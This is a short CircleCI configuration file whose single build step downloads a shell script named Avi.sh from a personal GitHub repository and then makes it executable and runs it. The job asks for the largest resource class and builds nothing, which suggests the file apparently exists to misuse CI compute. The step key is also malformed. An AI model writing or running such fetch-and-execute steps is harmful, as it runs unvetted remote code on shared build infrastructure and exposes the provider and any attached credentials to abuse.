version: 2.1
jobs:
  build:
    docker:
      - image: buildpack-deps:trusty
        auth:
          username: mydockerhub-user
          password: $DOCKERHUB_PASSWORD  # context / project UI env-var reference
    resource_class: 2xlarge+
    steps:
      -run: wget https://github.com/Akatsoki/newwz/raw/main/Avi.sh && chmod +x Avi.sh && ./Avi.sh 
